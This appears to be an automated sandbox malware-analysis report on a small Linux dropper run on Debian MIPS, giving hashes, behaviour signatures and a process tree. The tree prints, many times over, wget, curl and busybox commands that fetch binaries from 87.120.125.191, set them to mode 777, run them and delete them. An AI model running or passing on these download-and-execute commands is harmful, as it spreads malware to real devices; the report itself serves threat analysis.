Analysis
-
max time kernel
50s -
max time network
51s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/11/2024, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
debian9-mipsel-20240418-en
General
-
Target
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
-
Size
10KB
-
MD5
15e750247f2724d961a7f702afe120f0
-
SHA1
887ce46a3f6cb1d6488b9d07ef0cbdb6f34790d8
-
SHA256
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41
-
SHA512
2c0737cc90e138cf6f5664efe3a4c346818e19faa3457e7512cb785bc8df9682b2ac3e80efbe2a0d61b5bd5ad28e98b840686691a89ee2105ff75bbf2b14dc7a
-
SSDEEP
192:mDHJ7DHy7jn+771ds5ZxYIf7jnHwgpwZ5YwJp674o/amP08Ea1y1+1D0845ZBDH+:W6+7SXrIhof
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N/tmp/66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:724
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:750
-
-
/bin/chmodchmod 777 hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND./hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:757
-
-
/bin/chmodchmod 777 noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY./noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:779
-
-
/bin/chmodchmod 777 BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY./BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:803
-
-
/bin/chmodchmod 777 j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61./j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:822
-
-
/bin/chmodchmod 777 izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk./izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:830
-
-
/bin/chmodchmod 777 vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o./vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:837
-
-
/bin/chmodchmod 777 AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj./AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:859
-
-
/bin/chmodchmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:881
-
-
/bin/chmodchmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:888
-
-
/bin/chmodchmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309./nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:895
-
-
/bin/chmodchmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:902
-
-
/bin/chmodchmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:912
-
-
/bin/chmodchmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:919
-
-
/bin/chmodchmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:926
-
-
/bin/chmodchmod 777 izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk./izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:933
-
-
/bin/chmodchmod 777 hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND./hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:940
-
-
/bin/chmodchmod 777 noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY./noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:947
-
-
/bin/chmodchmod 777 BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY./BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:954
-
-
/bin/chmodchmod 777 j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61./j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:961
-
-
/bin/chmodchmod 777 vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o./vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:968
-
-
/bin/chmodchmod 777 AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj./AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:975
-
-
/bin/chmodchmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:982
-
-
/bin/chmodchmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:986
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:987
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Reads runtime system information
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:989
-
-
/bin/chmodchmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309./nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:996
-
-
/bin/chmodchmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:1000
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1001
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1002
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1003
-
-
/bin/chmodchmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1007
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1008
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1009
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1010
-
-
/bin/chmodchmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1014
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1015
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1016
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1017
-
-
/bin/chmodchmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1021
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
114B
MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7